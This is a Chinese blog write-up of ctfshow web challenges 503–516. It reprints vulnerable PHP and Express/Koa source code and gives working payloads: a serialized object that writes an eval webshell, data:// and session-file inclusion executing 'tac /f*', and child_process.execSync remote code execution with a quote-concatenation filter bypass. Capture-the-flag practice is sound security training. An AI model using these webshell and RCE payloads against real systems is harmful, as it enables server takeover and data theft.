ctfshow web入门 中期测评 web503--web516(无web511--web514)

于 2024-07-29 21:01:21 发布
阅读量281 收藏 3
点赞数 6
文章标签: android okhttp 经验分享 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81040377/article/details/140731994
版权

web503

看了之前的文件的发现都没办法利用了

在这里插入图片描述
这个页面的源码发现了

layui.use(['layer', 'form'], function(){
  var layer = layui.layer
  ,form = layui.form;
  form.on('submit(admin_settings)', function(data){
  	$.ajax({
      url:'api/admin_settings.php',
      dataType:"json",
      type:'post',
      data:{
        title:data.field['title'],
        copy_right:data.field['copy_right'],
        beian:data.field['beian'],
        seo:data.field['seo']
      },
      success:function(data){
        
        layer.alert(data.msg, function(index){
		  location.reload();
		});  
      }

    });
    return false;
  });
});

layui.use('element', function(){
  var element = layui.element;
});
layui.use('upload', function(){
  var upload = layui.upload;
   
  var uploadInst = upload.render({
    elem: '#logo' 
    ,url: 'api/admin_upload.php' 
    ,done: function(data){
    	layer.alert(data.msg, function(index){
		  location.reload();
		});
    }
  });
});
function change_avatar(){
	$('#avatar').toggle();
}

?action=../api/admin_upload

<?php

session_start();

error_reporting(0);
$user= $_SESSION['user'];
$ret = array(
		"code"=>0,
		"msg"=>"查询失败",
		"count"=>0,
		"data"=>array()
	);
if($user){
	$arr = $_FILES["file"];
	if(($arr["type"]=="image/jpeg" || $arr["type"]=="image/png" ) && $arr["size"]<10241000 )
	{
		$arr["tmp_name"];
		$filename = md5($arr['name']);       //传入的文件名被MD5
		$ext = pathinfo($arr['name'],PATHINFO_EXTENSION);     //获取文件扩展名
		if(!preg_match('/^php$/i', $ext)){
			$basename = "../img/".$filename.'.' . $ext;     
			move_uploaded_file($arr["tmp_name"],$basename); //文件被移动到/var/www/html/img
			$config = unserialize(file_get_contents(__DIR__.'/../config/settings'));
			$config['logo']=$filename.'.' . $ext;
			file_put_contents(__DIR__.'/../config/settings', serialize($config));
			$ret['msg']='文件上传成功';
		}
		
	}else{
		$ret['msg']='文件上传失败';
	}
	
	die(json_encode($ret));

}else{
	$ret['msg']='请登录后使用此功能';
	die(json_encode($ret));
}

?action=../api/admin_db_backup

<?php

session_start();

include('../render/db_class.php');
error_reporting(0);
$user= $_SESSION['user'];
$pre=__DIR__.'/../backup/'.date_format(date_create(),'Y-m-d').'/db.';
$ret = array(
		"code"=>0,
		"msg"=>"查询失败",
		"count"=>0,
		"data"=>array()
	);
if($user){
	extract($_POST);
	if(file_exists($pre.$db_format)){      
			$ret['msg']='数据库备份成功';
			die(json_encode($ret));
	}

	if(preg_match('/^(zip|tar|sql)$/', $db_format)){
		shell_exec('mysqldump -u root -h 127.0.0.1 -proot --databases ctfshow > '.md5($pre.$db_format));
		if(file_exists($pre.$db_format)){
			$ret['msg']='数据库备份成功';
		}else{
			$ret['msg']='数据库备份失败';
		}
	}else{
		$ret['msg']='数据库备份失败';
	}
	die(json_encode($ret));

}else{
	$ret['msg']='请登录后使用此功能';
	die(json_encode($ret));
}

file_exists触发phar反序列化

<?php


error_reporting(0);
class db{
	
	public $db;
	public $log;
	public $sql;
	public $username='root';
	public $password='root';
	public $port='3306';
	public $addr='127.0.0.1';
	public $database='ctfshow';
	public function __construct(){
		$this->log=new dbLog();
		$this->db=$this->getConnection();
	}

	public function getConnection(){
		 
		return new mysqli($this->addr,$this->username,$this->password,$this->database);
	}

	public  function select_one($sql){
		$this->sql=$sql;
		$result=$this->db->query($sql);
		if($result){
			return $result->fetch_object();
		}

	}
	public  function select_one_array($sql){
		$this->sql=$sql;
		$conn = db::getConnection();
		$result=$this->db->query($sql);
		if($result){
			return $result->fetch_assoc();
		}
	}
	public function update_one($sql){
		$this->sql=$sql;
		$conn = db::getConnection();
		$this->db->query($sql);
		return $this->db->affected_rows;
	}

	public function __destruct(){
		$this->log->log($this->sql);
	}
}
class dbLog{
	public $sql;
	public $content;
	public $log;

	public function __construct(){
		$this->log='log/'.date_format(date_create(),"Y-m-d").'.txt';
	}
	public function log($sql){
		$this->content = $this->content.date_format(date_create(),"Y-m-d-H-i-s").' '.$sql.' \r\n';
	}
	public function __destruct(){
		file_put_contents($this->log, $this->content,FILE_APPEND);
	}
}

思路

先打一个phar文件进去--》
在backup传参pre=/var/www/html/img&db_format=我们传入文件的md5文件名比如打的是aaa.phar
就传c54c75d1d14d4d656f5c33d25b3bfbaa加后缀phar

至于具体的操作怎么来先欠着不会phar反序列化

web504

在这里插入图片描述
有多的文件了
bushi,看不了源码了
在这里插入图片描述
在这个地方抓包观察一下
在这里插入图片描述

在这里插入图片描述

创建模版的地方抓包看看
在这里插入图片描述
找一下文件在哪里
在这里插入图片描述
发现上传在这里但是还是没有利用的点哇,我们之前序列化写马成功了,现在看看那
在这里插入图片描述
在这里插入图片描述
诶还是没成功,路径改改
在这里插入图片描述
终于getshell
在这里插入图片描述
EXP是这个

<?php
class dbLog{
	public $content='<?=eval($_POST[1]);?>';
	public $log='/var/www/html/ma.php';

	public function __destruct(){
		file_put_contents($this->log, $this->content,FILE_APPEND);
	}
}
echo urlencode(serialize(new dbLog()));
?>

web505

进入页面发现有个文件查看又可以看源码了
在这里插入图片描述
看一下源码先

<?php

session_start();

error_reporting(0);
$user= $_SESSION['user'];
$ret = array(
		"code"=>0,
		"msg"=>"查询失败",
		"count"=>0,
		"data"=>array()
	);
if($user){

	extract($_POST);
	if($debug==1 && preg_match('/^user/', file_get_contents($f))){
		include($f);
	}else{
		$ret['data']=array('contents'=>file_get_contents(__DIR__.'/../'.$name));
	}
	$ret['msg']='查看成功';
	die(json_encode($ret));

}else{
	$ret['msg']='请登录后使用此功能';
	die(json_encode($ret));
}

这里可以直接写马,用POST覆盖,要使得文件包含
已知文件在templates里面,然后在
url/api/api/admin_file_view.php传参
在这里插入图片描述

web506

api/admin_file_view.php

<?php


session_start();

error_reporting(0);
$user= $_SESSION['user'];
$ret = array(
		"code"=>0,
		"msg"=>"查询失败",
		"count"=>0,
		"data"=>array()
	);
if($user){

	extract($_POST);
	$ext = substr($f, strlen($f)-3,3);
	if(preg_match('/php|sml|phar/i', $ext)){
		$ret['msg']='请不要使用此功能';
		die(json_encode($ret));
	}
	if($debug==1 && preg_match('/^user/', file_get_contents($f))){
		include($f);
	}else{
		$ret['data']=array('contents'=>file_get_contents(__DIR__.'/../'.$name));
	}
	$ret['msg']='查看成功';
	die(json_encode($ret));

}else{
	$ret['msg']='请登录后使用此功能';
	die(json_encode($ret));
}

文件后缀名字需要改一下
在这里插入图片描述

在这里插入图片描述

web507

<?php

session_start();

error_reporting(0);
$user= $_SESSION['user'];
$ret = array(
		"code"=>0,
		"msg"=>"查询失败",
		"count"=>0,
		"data"=>array()
	);
if($user){

	extract($_POST);
	$ext = substr($f, strlen($f)-3,3);
	if(preg_match('/php|sml|phar/i', $ext)){
		$ret['msg']='请不要使用此功能';
		die(json_encode($ret));
	}
	if($debug==1 && preg_match('/^user/', file_get_contents($f))){
		include($f);
	}else{
		$ret['data']=array('contents'=>file_get_contents(__DIR__.'/../'.$name));
	}
	$ret['msg']='查看成功';
	die(json_encode($ret));

}else{
	$ret['msg']='请登录后使用此功能';
	die(json_encode($ret));
}

我上传文件并没有成功
直接读取用data协议

debug=1&f=data://test/palin,user<?php+system("tac /f*");

在这里插入图片描述
但是这是为什么呢,文件都是一模一样的

web508

在这里插入图片描述

上传头像这个地方其实是可以上传木马的
这个头像的位置在临时文件下面
/tmp/sess_cookie值

url/api/admin_file_view.php

POST:
debug=1&f=/tmp/sess_s4k5igq6j7ccld43846e2nots5&1=echo `tac /f*`;

在这里插入图片描述

web509

没有禁sess还是像上题一样

web510

一样的打法

web515

var express = require('express');
var _= require('lodash');
var router = express.Router();

/* GET users listing. */
router.get('/', function(req, res, next) {
  res.render('index', { title: '鎴戞槸澶嶈鏈�' });
});

router.post('/',function(req,res,next){
	if(req.body.user!=null){
		msg = req.body.user;
		if((msg.match(/proto|process|require|exec|var|'|"|:|\[|\]|[0-9]/))!==null || msg.length>40){
		  	res.render('index', { title: '鏁忔劅淇℃伅涓嶅璇�' });
		}else{
			res.render('index', { title: eval(msg) });
		}
	}else{
		res.render('index', { title: '鎴戞槸澶嶈鏈�' });
	}
	 
});
module.exports = router;

在这里插入图片描述

在路由index.php中POST传参user=...

那么这里是是js的RCE
首先GET传参没有过滤
POST传参user有部分过滤

https://46e2a8d3-92b0-432e-8fc2-8f47b7a2da0b.challenge.ctf.show/index.php?b=require("child_process").execSync("tac /f*")
POST:
user=eval(req.query.b) //执行GET传参的b参数

当然也可以直接POST传参

在这里插入图片描述

user=eval(req.body.b)&b=require("child_process").execSync("tac /f*")

web516

if(user!==undefined){
		ctx.body='<h3>Hello '+user[0].username+'</h3> your name is: '+user[0].username+' your id is: '+user[0].id+ ' your password is: '+eval('md5('+user[0].password+')');
	}else{
		ctx.render('/');
	}

审计代码发现这里可以代码执行

app.use(async(ctx,next)=>{
	if(ctx.request.body.password!==undefined && (ctx.request.body.password.match(/proto|JSON|parse|process|require|exec|var|merge|response|body|request/))!==null){
		return
	}else{
		await next()
	}
	
})

审计这里发现了过滤的东西,使用引号绕过

username=aaaa&password=1)%2beval(('req'%2b'uire("chi'%2b'ld_proce'%2b'ss").ex'%2b'ecSync("echo $FLAG")')

一个很正常的绕过姿势
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

baozongwi
关注
  • 6
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctfshow web入门 中期测评 web492--web502
2301_81040377的博客
07-26 552
又可以写文件了,但是得找利用点,先扒源码吧这里有个替换函数可以把value写在网页里面,我们传数组即可不对必须是username写进去了还有一种是直接把html前后闭合了。
ctfshow web入门 中期测评 web486--web491
2301_81040377的博客
06-01 173
由于我们写马所以SQL语句执行不了,最后存储的数据为空,user也就为0,也就解释了前面的东西。自动时间盲注,然后找sleep我觉得很强,不用自己找payload写脚本。非预期,这里就是有一个url的观察,发现参数action。就是接到参数然后写在文件里面只不过是MD5 的文件名。我们猜测flag在根目录下面,写文件然后访问。然后看到源码里面另外两个文件没有 依次访问。sql语句正常了,还是可以写index。但是我们用sqlmap是不影响。同样的目录穿越方法查看源码。这里我们之前是做过的,
ctf.show中期测评(web486-web516)
wanan的博客
09-03 989
ctf.show中期测评(web486-web516)
CTFSHOW中期测评486-509(持续更新中)
羽的博客
03-30 1624
web486 扫描后台发现flag.php,根据url发现存在文件包含,templates/xxx.php 所以只需要action=…/flag即可 payload: index.php?action=../flag web487
NISP一级备考知识总结之信息安全概述、信息安全基础
最新发布
2401_84618514的博客
07-29 233
信息奠基人香农认为:信息是用来消除随即不确定性的东西信息是事务运动状态或存在方式的不确定性的描述信息是具体的,并且可以被人(生物,机器等)所感知、提取、识别,可以被传递、存储、变换、处理、显示、检索、利用信息来源于物质,又不是物质本身;他是从物质的运动中产生出来,又可以脱离源物质而寄生于媒体物质,相对独立地存在信息的功能:反映事物内部属性、状态、结构、相互联系以及与外部环境的互动关系,减少事务的不确定性信息的表达:信息本身是无形的,借助于信息媒体以多种形式存在或传播。
NISP一级备考知识总结之信息安全概述、信息安全基础_
2201_75362610的博客
03-09 1487
信息奠基人香农认为:信息是用来消除随即不确定性的东西信息是事务运动状态或存在方式的不确定性的描述信息是具体的,并且可以被人(生物,机器等)所感知、提取、识别,可以被传递、存储、变换、处理、显示、检索、利用信息来源于物质,又不是物质本身;他是从物质的运动中产生出来,又可以脱离源物质而寄生于媒体物质,相对独立地存在信息的功能:反映事物内部属性、状态、结构、相互联系以及与外部环境的互动关系,减少事务的不确定性信息的表达:信息本身是无形的,借助于信息媒体以多种形式存在或传播。
Python开发-评测哪个Web框架是最快的
08-09
本篇文章将深入探讨如何评测Python中的Web框架性能,以及可能影响速度的关键因素。我们将以"The Benchmarker Web Frameworks"项目为参考,该项目提供了对多个流行Python Web框架的基准测试。 首先,我们来了解...
毕业论文-基于WEB的学生综合测评系统的设计与实现
09-14
本文根据学生综合测评系统的特点,采用 B / S (浏览器/服务器)的系统设计方案。选用 ASP . NET 和 SQL Server 2008开发环境,设计并实现了一个学生综合测评系统。主要工作如下: 首先,本文对系统进行了全面的...
评测哪个Web框架是最快的?-python
06-18
评测哪个Web框架是最快的? 哪个最快? 该项目旨在成为一个负载基准测试套件,不多也不少,测量每个框架(中间件)的响应时间(路由时间)。 :warning: :warning: :warning: :warning: :warning: :warning: :...
Web测试工具对比--自动化软件测试(1)
03-23
webWebWeb测试工具对比--自动化软件测试(1)软件测试针对xxx(java开发)软件进行测试,对winrunner7.0,RationalRobot,QuickTest进行评测,评测主要包括易用性,扩展性,稳定性等三方面.xxx登陆功能是使用最频繁的功能...
hustoj-souce.zip_WEB开发_PHP_
08-11
【标题】"hustoj-source.zip" 是一个与WEB开发相关的源代码压缩包,主要使用PHP编程语言构建。这个系统设计用于在线评测和测试代码,它利用PHP的特性来实现这一功能。 【描述】提到,该系统是"基于PHP编译而成",这...
Android】广播机制
2301_79977698的博客
07-24 844
Android中,广播(Broadcast)是一种消息,任何应用程序都可以发送广播消息,任何应用程序也都可以接收广播消息。广播通常用于通知应用程序某些事件的发生,比如系统启动、电量低、网络状态改变等。Broadcast Receiver(广播接收器):用于接收广播消息并响应这些消息的组件。Intent(意图):用于传递广播消息的数据结构。标准广播(Normal Broadcast)是完全异步的,所有接收器几乎同时接收广播,并且接收顺序是不确定的。
Unity Android接入SDK 遇到的问题
qq_37672438的博客
07-25 946
所以获取gradle.properties 文件的位置的时候,2019之后要返回上一级再获取,即:/Temp/ gradleout/unityLibrary/../gradle.properties。其实就是gradle版本太低了,升级下gradle,会自动的去升级kotlin,也就是升级Android studio或者idea。之后变成了/Temp/ gradleout/unityLibrary。下载jd_gui 工具 ,或者 idea 下载jd 插件,为/Temp/ gradleout。
Android笔试面试题AI答之Android系统与综合类(1)
学无止境,止于至善
07-25 923
答案仅供参考,来着文心一言、Kimi.ai。
DASCTF-BabyAndroid
Nike_name的博客
07-24 429
jpg隐藏解密函数,native层余弦变换什么什么的
android前台服务
fumeidonga的博客
07-25 1018
关于作者:CSDN内容合伙人、技术专家, 从零开始做日活千万级APP。专注于分享各领域原创系列文章 ,擅长java后端、移动开发、商业变现、人工智能等,希望大家多多支持。未经允许不得转载。
Android APK混淆处理方案分析
qq_38794072的博客
07-24 878
提供apk给到外部,外部对apk进行二次处理后重新给我们一个新apk。尝试分析源apk文件和处理后的apk文件区别,根据其中区别推测外部的混淆处理方案,尽可能还原外部对apk的处理方式。以下对处理和未处理的apk文件用新、旧apk名称表示。通过反编译工具分析可以得出外部处理的新 app 操作主要是对 dex 文件增加了垃圾代码提高主包的相似度,避免被Google识别,然后进行了混淆处理。处理 dex 利用 BlackObfuscator-GUI 等工具处理后对 apk。
BUUCTF [MRCTF2020]Ezpop
weixin_73399382的博客
07-24 704
b->source->str = $c中$b->source已经成为一个新的Show实例对象,通过该对象访问str,为其赋值为$c(Test类的对象),又因为Test类中访问不到source资源从而触发get方法。$b->source = new Show()因为通过$b这个对象进行访问的,所以需要source赋值一个新的Show对象,用来触发__toString方法。$c->p = $a将Test中的p赋值为一个Modify对象,用来触发invoke方法。得到一串base64。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值